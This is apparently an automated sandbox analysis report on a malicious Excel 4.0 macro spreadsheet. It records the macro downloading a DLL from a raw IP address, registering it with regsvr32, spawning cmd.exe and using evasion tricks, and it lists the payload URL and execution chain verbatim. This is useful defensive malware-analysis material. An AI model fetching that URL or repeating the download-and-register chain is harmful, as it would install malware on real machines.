Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://settings.outlook.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://tasks.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Found Excel 4.0 Macro with suspicious formulas

Source: Total_order_data-V2434883.xlsb	Initial sample: CALL
Source: Total_order_data-V2434883.xlsb	Initial sample: CALL
Source: Total_order_data-V2434883.xlsb	Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal80.expl.evad.winXLSB@5/10@0/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{40B4E29A-81E2-4785-950C-FD213AB7F011} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image4.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image5.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Data Obfuscation:

Registers a DLL

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_00E02AF0 push dword ptr [edx+14h]; ret

2_2_00E02BFD

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll

Jump to dropped file

Anti Debugging:

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_01170456 mov eax, dword ptr fs:[00000030h]		2_2_01170456
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0117095E mov eax, dword ptr fs:[00000030h]		2_2_0117095E

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe

Jump to behavior

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.180.199.121	unknown	Netherlands		14576	HOSTING-SOLUTIONSUS	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.180.199.121/sat1_0609_2.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection:

Antivirus or Machine Learning detection for unpacked file

Source: 2.2.regsvr32.exe.970000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.2.regsvr32.exe.8340f0.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: sat1_0609_2[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80

Networking:

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121

Source: global traffic

Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.office.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.onedrive.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://augloop.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.entity.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cortana.ai/api
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cr.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://directory.services.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
